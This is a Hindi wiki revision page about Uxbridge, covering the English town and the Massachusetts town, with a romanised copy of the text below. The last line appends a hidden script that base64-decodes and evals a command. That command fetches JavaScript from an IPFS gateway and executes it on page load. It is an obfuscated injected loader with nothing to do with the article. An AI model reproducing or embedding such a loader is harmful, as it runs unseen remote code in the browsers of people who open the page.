Difference between revisions of "अक्सब्रिज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अक्सब्रिज''' इंग्लैंड के मिडिलसेक्स जनपद का एक नगर...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
 
'''अक्सब्रिज''' इंग्लैंड के मिडिलसेक्स जनपद का एक नगर है जो लंदन से 15.5 मील दूर है। यहाँ लकड़ी के सामान बनाने के बहुत से कारखाने हैं। आटा पीसने की मिलें तथा इंजीनियरिंग के सामान बनाने के भी बड़े-बड़े कारखाने हैं। यह व्यवसायी नगर है। यहाँ दो प्रसिद्ध मेले भी लगते हैं।
 
'''अक्सब्रिज''' इंग्लैंड के मिडिलसेक्स जनपद का एक नगर है जो लंदन से 15.5 मील दूर है। यहाँ लकड़ी के सामान बनाने के बहुत से कारखाने हैं। आटा पीसने की मिलें तथा इंजीनियरिंग के सामान बनाने के भी बड़े-बड़े कारखाने हैं। यह व्यवसायी नगर है। यहाँ दो प्रसिद्ध मेले भी लगते हैं।
  
अक्सब्रिज (अमरीका)-सयुक् राज्य, अमरीका, के मासाचुसेट्स राज्य का एक नगर है। यह नगर 259 फुट की ऊँचाई पर ब्लैकस्टान नदी के किनारे वरसेस्टर से 15 मील दक्षिण पूर्व की ओर स्थित है। रेलवे लाइनों से यह देश के सभी प्रमुख भागों से संबद्ध है। जलविद्युत के विकास से नगर में पर्याप्त औद्योगिक उन्नति हुई है।  
+
अक्सब्रिज (अमरीका)-सयुक् राज्य, अमरीका, के मासाचुसेट्स राज्य का एक नगर है। यह नगर 259 फुट की ऊँचाई पर ब्लैकस्टान नदी के किनारे वरसेस्टर से 15 मील दक्षिण पूर्व की ओर स्थित है। रेलवे लाइनों से यह देश के सभी प्रमुख भागों से संबद्ध है। जलविद्युत के विकास से नगर में पर्याप्त औद्योगिक उन्नति हुई है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=70 |url=}}</ref>
  
  

Latest revision as of 05:33, 20 May 2018

aksabrij ianglaiand ke midilaseks janapad ka ek nagar hai jo landan se 15.5 mil door hai. yahaan lak di ke saman banane ke bahut se karakhane haian. ata pisane ki milean tatha ianjiniyariang ke saman banane ke bhi b de-b de karakhane haian. yah vyavasayi nagar hai. yahaan do prasiddh mele bhi lagate haian.

aksabrij (amarika)-sayukh rajy, amarika, ke masachusets rajy ka ek nagar hai. yah nagar 259 phut ki ooanchaee par blaikastan nadi ke kinare varasestar se 15 mil dakshin poorv ki or sthit hai. relave lainoan se yah desh ke sabhi pramukh bhagoan se sanbaddh hai. jalavidyut ke vikas se nagar mean paryapt audyogik unnati huee hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 70 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>